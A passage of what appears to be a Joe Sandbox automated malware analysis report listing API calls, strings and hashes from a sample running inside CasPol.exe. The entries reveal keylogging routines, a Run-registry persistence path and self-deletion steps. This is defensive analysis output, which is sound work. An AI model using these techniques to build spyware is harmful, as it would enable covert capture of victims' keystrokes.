                                                                              • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                              • String ID: [AltL]$[AltR]
                                                                              • API String ID: 2738857842-2658077756
                                                                              • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                              • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                              • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                              • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00448825
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast_free
                                                                              • String ID: `@$`@
                                                                              • API String ID: 1353095263-20545824
                                                                              • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                              • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                              • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                              APIs
                                                                              • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State
                                                                              • String ID: [CtrlL]$[CtrlR]
                                                                              • API String ID: 1649606143-2446555240
                                                                              • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                              • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                              • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                              • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteOpenValue
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                              • API String ID: 2654517830-1051519024
                                                                              • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                              • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                              • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteDirectoryFileRemove
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3325800564-4028850238
                                                                              • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                              • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                              • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                              • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                              APIs
                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 1872346434-4028850238
                                                                              • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                              • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                              • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                              • GetLastError.KERNEL32 ref: 0043FB02
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1717984340-0
                                                                              • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                              • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                              • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                              • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759